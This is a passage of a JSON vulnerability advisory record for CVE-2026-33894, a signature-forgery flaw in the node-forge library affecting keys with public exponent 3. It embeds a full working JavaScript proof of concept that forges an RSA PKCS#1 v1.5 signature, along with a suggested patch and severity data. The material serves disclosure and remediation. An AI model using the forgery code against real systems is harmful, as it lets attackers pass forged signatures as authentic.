8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS < 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. 
Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n  - forge verify (`_parseAllDigestBytes: true`), and\n  - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n  - `control-forge-strict: true`\n  - `control-node: true`\n  - `forgery (forge library, strict): true`\n  - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n<details><summary>repro_min.js</summary>\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst crypto = require('crypto');\nconst forge = require('./forge/lib/index');\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n//   SEQUENCE { OID sha256, NULL },\n//   OCTET STRING <32-byte digest>\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n  '300d060960864801650304020105000420',\n  'hex'\n);\n\nconst toBig = b => BigInt('0x' + (b.toString('hex') || '0'));\nfunction toBuf(n, len) {\n  let h = n.toString(16);\n  if (h.length % 2) h = '0' + h;\n  const b = Buffer.from(h, 'hex');\n  return b.length < len ? 
Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n  let lo = 0n;\n  let hi = 1n;\n  while (hi * hi * hi <= n) hi <<= 1n;\n  while (lo + 1n < hi) {\n    const mid = (lo + hi) >> 1n;\n    if (mid * mid * mid <= n) lo = mid;\n    else hi = mid;\n  }\n  return lo;\n}\nconst cbrtCeil = n => {\n  const f = cbrtFloor(n);\n  return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n  if (len < 0x80) return Buffer.from([len]);\n  if (len <= 0xff) return Buffer.from([0x81, len]);\n  return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n  const key = forge.pki.publicKeyFromPem(publicPem);\n  const md = forge.md.sha256.create();\n  md.update(msg.toString('utf8'), 'utf8');\n  try {\n    // verify(digestBytes, signatureBytes, scheme, options):\n    // - digestBytes: raw SHA-256 digest bytes for `msg`\n    // - signatureBytes: binary-string representation of the candidate signature\n    // - scheme: undefined => default RSASSA-PKCS1-v1_5\n    // - options._parseAllDigestBytes: require DER parser to consume all bytes\n    //   (this is forge's default for verify; set explicitly here for clarity)\n    return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };\n  } catch (err) {\n    return { ok: false, err: err.message };\n  }\n}\n\nfunction main() {\n  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {\n    modulusLength: 4096,\n    publicExponent: 3,\n    privateKeyEncoding: { type: 'pkcs1', format: 'pem' },\n    publicKeyEncoding: { type: 'pkcs1', format: 'pem' }\n  });\n\n  const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });\n  const nBytes = Buffer.from(jwk.n, 'base64url');\n  const n = toBig(nBytes);\n  const e = toBig(Buffer.from(jwk.e, 'base64url'));\n  if (e !== 3n) throw new Error('expected e=3');\n\n  const msg = Buffer.from('forged-message-0', 'utf8');\n  const digest = 
crypto.createHash('sha256').update(msg).digest();\n  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n  const k = nBytes.length;\n  // ffCount can be set to any value at or below 111 and produce a valid signature.\n  // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n  // However, current versions of node forge do not check for this.\n  // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n  const ffCount = 0; \n  // `garbageLen` affects DER length field sizes, which in turn affect how\n  // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n  // A small cap (8) is enough here: DER length-size transitions are discrete\n  // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.\n  let garbageLen = 0;\n  for (let i = 0; i < 8; i += 1) {\n    const gLenEnc = derLen(garbageLen).length;\n    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n    const seqLenEnc = derLen(seqLen).length;\n    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n    const next = k - fixed;\n    if (next === garbageLen) break;\n    garbageLen = next;\n  }\n  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;\n  const prefix = Buffer.concat([\n    Buffer.from([0x00, 0x01]),\n    Buffer.alloc(ffCount, 0xff),\n    Buffer.from([0x00]),\n    Buffer.from([0x30]), derLen(seqLen),\n    algAndDigest,\n    Buffer.from([0x04]), derLen(garbageLen)\n  ]);\n\n  // Build the numeric interval of all EM values that start with `prefix`:\n  // - `low`  = prefix || 00..00\n  // - `high` = one past (prefix || ff..ff)\n  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n  const suffixLen = k - prefix.length;\n  const low = 
toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n  const high = low + (1n << BigInt(8 * suffixLen));\n  const s = cbrtCeil(low);\n  if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');\n\n  const sig = toBuf(s, k);\n\n  const controlMsg = Buffer.from('control-message', 'utf8');\n  const controlSig = crypto.sign('sha256', controlMsg, {\n    key: privateKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  });\n\n  // forge verification calls (library under test)\n  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n  const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n  // Node.js verification calls (OpenSSL-backed reference behavior)\n  const controlNode = crypto.verify('sha256', controlMsg, {\n    key: publicKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  }, controlSig);\n  const forgedNode = crypto.verify('sha256', msg, {\n    key: publicKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  }, sig);\n\n  console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');\n  console.log('control-node:', controlNode);\n  console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');\n  console.log('forgery (node/OpenSSL):', forgedNode);\n}\n\nmain();\n```\n</details>\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS >= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n             error.errors = errors;\n             throw error;\n           }\n+\n+          if(obj.value.length != 2) 
{\n+            var error = new Error(\n+              'DigestInfo ASN.1 object must contain exactly 2 fields for ' +\n+              'a valid RSASSA-PKCS1-v1_5 package.');\n+            error.errors = errors;\n+            throw error;\n+          }\n           // check hash algorithm identifier\n           // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n           // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n       }\n       ++padNum;\n     }\n+\n+    if (padNum < 8) {\n+      throw new Error('Encryption block is invalid.');\n+    }\n   } else if(bt === 0x02) {\n     // look for 0x00 byte\n     padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n  - > This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-ppp5-5v6c-4jwp.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an additional field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33894"
                },
                {
                    "category": "description",
                    "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an additional field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33894.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33894.json"
                },
                {
                    "category": "other",
                    "text": "0.00029",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product_remediation data available from source Redhat",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5920253",
                    "CSAFPID-5956281",
                    "CSAFPID-1439292",
                    "CSAFPID-1439294",
                    "CSAFPID-1439306",
                    "CSAFPID-1439317",
                    "CSAFPID-1439319",
                    "CSAFPID-1441200",
                    "CSAFPID-1455906",
                    "CSAFPID-1459353",
                    "CSAFPID-1459355",
                    "CSAFPID-1496261",
                    "CSAFPID-1508257",
                    "CSAFPID-1771999",
                    "CSAFPID-1837472",
                    "CSAFPID-1837473",
                    "CSAFPID-2109952",
                    "CSAFPID-2109953",
                    "CSAFPID-2467441",
                    "CSAFPID-2467442",
                    "CSAFPID-2467443",
                    "CSAFPID-2467444",
                    "CSAFPID-2467445",
                    "CSAFPID-2467448",
                    "CSAFPID-2552001",
                    "CSAFPID-2698055",
                    "CSAFPID-2698057",
                    "CSAFPID-2855724",
                    "CSAFPID-2855725",
                    "CSAFPID-2858634",
                    "CSAFPID-2868420",
                    "CSAFPID-2914696",
                    "CSAFPID-2914697",
                    "CSAFPID-5187689",
                    "CSAFPID-5222698",
                    "CSAFPID-5940623",
                    "CSAFPID-5940626",
                    "CSAFPID-5940629"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-ppp5-5v6c-4jwp"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-ppp5-5v6c-4jwp.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33894"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33894.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33894.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-ppp5-5v6c-4jwp"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
                    "product_ids": [
                        "CSAFPID-1439292",
                        "CSAFPID-1439294",
                        "CSAFPID-1439306",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1459353",
                        "CSAFPID-1459355",
                        "CSAFPID-1496261",
                        "CSAFPID-1508257",
                        "CSAFPID-1771999",
                        "CSAFPID-1837472",
                        "CSAFPID-1837473",
                        "CSAFPID-2109952",
                        "CSAFPID-2109953",
                        "CSAFPID-2467441",
                        "CSAFPID-2467442",
                        "CSAFPID-2467443",
                        "CSAFPID-2467444",
                        "CSAFPID-2467445",
                        "CSAFPID-2467448",
                        "CSAFPID-2552001",
                        "CSAFPID-2698055",
                        "CSAFPID-2698057",
                        "CSAFPID-2855724",
                        "CSAFPID-2855725",
                        "CSAFPID-2858634",
                        "CSAFPID-2868420",
                        "CSAFPID-2914696",
                        "CSAFPID-2914697",
                        "CSAFPID-5187689",
                        "CSAFPID-5222698",
                        "CSAFPID-5940623",
                        "CSAFPID-5940626",
                        "CSAFPID-5940629"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1439292",
                        "CSAFPID-1439294",
                        "CSAFPID-1439306",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1459353",
                        "CSAFPID-1459355",
                        "CSAFPID-1496261",
                        "CSAFPID-1508257",
                        "CSAFPID-1771999",
                        "CSAFPID-1837472",
                        "CSAFPID-1837473",
                        "CSAFPID-2109952",
                        "CSAFPID-2109953",
                        "CSAFPID-2467441",
                        "CSAFPID-2467442",
                        "CSAFPID-2467443",
                        "CSAFPID-2467444",
                        "CSAFPID-2467445",
                        "CSAFPID-2467448",
                        "CSAFPID-2552001",
                        "CSAFPID-2698055",
                        "CSAFPID-2698057",
                        "CSAFPID-2855724",
                        "CSAFPID-2855725",
                        "CSAFPID-2858634",
                        "CSAFPID-2868420",
                        "CSAFPID-2914696",
                        "CSAFPID-2914697",
                        "CSAFPID-5187689",
                        "CSAFPID-5222698",
                        "CSAFPID-5920253",
                        "CSAFPID-5940623",
                        "CSAFPID-5940626",
                        "CSAFPID-5940629",
                        "CSAFPID-5956281"
                    ]
                }
            ],
            "title": "CVE-2026-33894"
        }
    ]
}